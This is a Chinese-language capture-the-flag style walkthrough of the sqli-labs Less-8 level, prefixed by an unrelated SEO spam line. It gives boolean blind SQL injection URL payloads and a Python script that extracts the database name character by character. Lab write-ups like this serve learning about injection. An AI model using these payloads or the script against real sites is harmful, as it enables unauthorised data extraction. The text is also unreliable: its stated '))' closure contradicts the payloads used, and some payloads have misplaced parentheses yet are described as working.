郑州网站排名推广制作网站怎么制作
less-8
打开靶场。
输入id=1得到了和前面一样的回显。
通过尝试前面的闭合方式,是’))的闭合方式。
我们输入id=1’)).
发现没有报错回显。
这关发现回显就2种方式,一种是有字符回显,一种是啥都没,那根据这样的回显方式我们可以使用布尔盲注的方法。
我们可以通过不断改变范围来查看页面的回显,这样我们最后就可以确定一个值,这样循环操作得到最后的结果。
比如我们可以用length函数和二分法来确定数据库的长度。
?id=1’ and (select length(database())>1) and 1=1 --+
正常回显。
我们尝试输入
?id=1’ and (select length(database()>8)) and 1=1 --+
显示无回显,下面我们输入
?id=1’ and (select length(database()>7)) and 1=1 --+
回显正常,再和前面的作比较,我们>8是无回显,>7有回显,说明就剩8是正确的了。通过这种方法我们就确定了数据库名的长度,也可以通过可以再利用ascii函数+substr函数来修改字符串的范围,判断数据库的各个字符的ASCII的值,来转换为最后的数据库名称。
那么根据这种方法,我们可以写一个py脚本来帮助我们解决这些循环的操作。
import requestsurl = "..."def inject_database(url):name = ''for i in range(1, 100):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)params = {"id": payload}r = requests.get(url, params=params)if "You are in..........." in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname = name + chr(mid)print(name)inject_database(url)
可以看到通过上面的脚本就可以轻松的通过布尔盲注的方式来解决。
查询数据库里的表与字段也可以通过写脚本的方式来执行。这里就不做阐述了。